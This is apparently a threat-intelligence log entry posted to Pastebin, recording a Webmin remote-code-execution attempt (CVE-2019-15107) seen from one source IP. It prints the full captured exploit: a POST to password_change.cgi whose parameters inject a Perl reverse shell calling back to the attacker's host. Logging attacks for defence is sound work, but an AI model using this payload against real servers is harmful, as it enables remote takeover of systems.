Advertisement
internetweather

93.180.64.69 Webmin Exploit Attempt

Oct 30th, 2019
1,605
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
  1. Source IP: 93.180.64.69
  2. Reverse DNS: hosted.by.coloprovider
  3. Country: Netherlands
  4. Payload: POST /password_change.cgi HTTP/1.1
  5. POST Data: "expired=perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"93.180.64.69:21");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'&new1=4Ge17TDt&new2=4Ge17TDt&old=perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"93.180.64.69:21");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
  6. Target Port: 10000
  7. Bad Packets® Tags: Webmin RCE | Platform | CVE-2019-15107
  8. Date Last Seen: 2019-10-30T22:29:53Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement